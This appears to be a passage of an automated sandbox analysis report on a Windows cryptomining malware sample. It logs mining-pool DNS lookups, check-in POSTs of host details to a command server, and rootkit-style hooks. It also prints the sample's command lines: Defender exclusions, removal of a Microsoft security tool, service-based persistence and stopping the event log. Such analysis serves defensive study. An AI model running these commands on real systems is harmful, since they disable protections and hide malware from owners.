                                                                              Jan 4, 2025 22:59:13.520193100 CET805708783.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:59:13.520272017 CET5708780192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:59:13.530303955 CET5708780192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:59:13.535093069 CET805708783.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:59:13.535135984 CET5708780192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:59:13.539874077 CET805708783.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:59:17.450932980 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:59:17.561057091 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:59:18.545663118 CET5708780192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:59:18.591214895 CET805708783.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:59:30.021420956 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:59:30.248558044 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:59:34.905865908 CET805708783.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:59:34.905994892 CET5708780192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:59:43.311321020 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:59:43.357891083 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:59:56.380270004 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:59:56.560939074 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 23:00:08.055403948 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 23:00:08.192651987 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 23:00:17.516058922 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 23:00:17.560795069 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 23:00:18.101805925 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 23:00:18.154562950 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 23:00:20.604311943 CET5708980192.168.2.583.217.209.235
                                                                              Jan 4, 2025 23:00:20.609174967 CET805708983.217.209.235192.168.2.5
                                                                              Jan 4, 2025 23:00:20.609282017 CET5708980192.168.2.583.217.209.235
                                                                              Jan 4, 2025 23:00:20.609375000 CET5708980192.168.2.583.217.209.235
                                                                              Jan 4, 2025 23:00:20.614136934 CET805708983.217.209.235192.168.2.5
                                                                              Jan 4, 2025 23:00:20.614234924 CET5708980192.168.2.583.217.209.235
                                                                              Jan 4, 2025 23:00:20.619019032 CET805708983.217.209.235192.168.2.5

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 4, 2025 22:58:13.875308037 CET5967453192.168.2.51.1.1.1
                                                                              Jan 4, 2025 22:58:13.882014036 CET53596741.1.1.1192.168.2.5
                                                                              Jan 4, 2025 22:58:39.396112919 CET5359024162.159.36.2192.168.2.5
                                                                              Jan 4, 2025 22:58:39.879900932 CET5691853192.168.2.51.1.1.1
                                                                              Jan 4, 2025 22:58:39.888663054 CET53569181.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 4, 2025 22:58:13.875308037 CET192.168.2.51.1.1.10xf322Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false
                                                                              Jan 4, 2025 22:58:39.879900932 CET192.168.2.51.1.1.10xbf5dStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 4, 2025 22:58:13.882014036 CET1.1.1.1192.168.2.50xf322No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 4, 2025 22:58:13.882014036 CET1.1.1.1192.168.2.50xf322No error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                                              Jan 4, 2025 22:58:13.882014036 CET1.1.1.1192.168.2.50xf322No error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                                              Jan 4, 2025 22:58:13.882014036 CET1.1.1.1192.168.2.50xf322No error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                                              Jan 4, 2025 22:58:39.888663054 CET1.1.1.1192.168.2.50xbf5dName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • 83.217.209.235

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.54970583.217.209.23580528C:\Windows\System32\dialer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 4, 2025 22:58:14.929846048 CET233OUTPOST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
                                                                              Accept: */*
                                                                              Connection: close
                                                                              Content-Length: 485
                                                                              Content-Type: application/json
                                                                              Host: 83.217.209.235
                                                                              User-Agent: cpp-httplib/0.12.6
                                                                              Jan 4, 2025 22:58:14.935831070 CET485OUTData Raw: 7b 22 69 64 22 3a 22 6c 64 6e 64 68 6f 61 69 66 6c 6b 68 70 61 64 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 33 35 33 34 37 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 35 31 5a 42 32 4d
                                                                              Data Ascii: {"id":"ldndhoaiflkhpadl","computername":"035347","username":"SYSTEM","gpu":"51ZB2MRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.55708783.217.209.23580528C:\Windows\System32\dialer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 4, 2025 22:59:13.530303955 CET233OUTPOST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
                                                                              Accept: */*
                                                                              Connection: close
                                                                              Content-Length: 501
                                                                              Content-Type: application/json
                                                                              Host: 83.217.209.235
                                                                              User-Agent: cpp-httplib/0.12.6
                                                                              Jan 4, 2025 22:59:13.535135984 CET501OUTData Raw: 7b 22 69 64 22 3a 22 6c 64 6e 64 68 6f 61 69 66 6c 6b 68 70 61 64 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 33 35 33 34 37 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 35 31 5a 42 32 4d
                                                                              Data Ascii: {"id":"ldndhoaiflkhpadl","computername":"035347","username":"SYSTEM","gpu":"51ZB2MRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              2192.168.2.55708983.217.209.23580
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 4, 2025 23:00:20.609375000 CET233OUTPOST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
                                                                              Accept: */*
                                                                              Connection: close
                                                                              Content-Length: 487
                                                                              Content-Type: application/json
                                                                              Host: 83.217.209.235
                                                                              User-Agent: cpp-httplib/0.12.6
                                                                              Jan 4, 2025 23:00:20.614234924 CET487OUTData Raw: 7b 22 69 64 22 3a 22 6c 64 6e 64 68 6f 61 69 66 6c 6b 68 70 61 64 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 33 35 33 34 37 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 35 31 5a 42 32 4d
                                                                              Data Ascii: {"id":"ldndhoaiflkhpadl","computername":"035347","username":"SYSTEM","gpu":"51ZB2MRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System"


                                                                              Code Manipulations

                                                                              User Modules

                                                                              Hook Summary

                                                                              Function NameHook TypeActive in Processes
                                                                              ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                              NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                              ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                              NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                              ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                              NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                              NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                              ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                              ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                              NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                              RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                              NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                              NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                              ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                              ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                                                              Processes

                                                                              Process: winlogon.exe, Module: ntdll.dll
                                                                              Function NameHook TypeNew Data
                                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              Process: explorer.exe, Module: ntdll.dll
                                                                              Function NameHook TypeNew Data
                                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:16:58:04
                                                                              Start date:04/01/2025
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0x7ff749f40000
                                                                              File size:2'867'712 bytes
                                                                              MD5 hash:A03484846E3418FFA2AB8AEC97A03E88
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:16:58:05
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:16:58:05
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff7caad0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff600680000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe delete "LightService"
                                                                              Imagebase:0x7ff6b45e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:18
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff71a810000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:19
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto"
                                                                              Imagebase:0x7ff6b45e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:20
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:21
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:winlogon.exe
                                                                              Imagebase:0x7ff6156c0000
                                                                              File size:906'240 bytes
                                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:22
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                              Imagebase:0x7ff6b45e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:23
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe start "LightService"
                                                                              Imagebase:0x7ff6b45e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:24
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:25
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:26
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\ProgramData\IGaming\driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\ProgramData\IGaming\driver.exe
                                                                              Imagebase:0x7ff7f4f20000
                                                                              File size:2'867'712 bytes
                                                                              MD5 hash:A03484846E3418FFA2AB8AEC97A03E88
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 82%, ReversingLabs
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:27
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\lsass.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                              Imagebase:0x7ff654c90000
                                                                              File size:59'456 bytes
                                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:28
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:29
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:30
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:31
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dwm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"dwm.exe"
                                                                              Imagebase:0x7ff79d4a0000
                                                                              File size:94'720 bytes
                                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                              Has elevated privileges:false
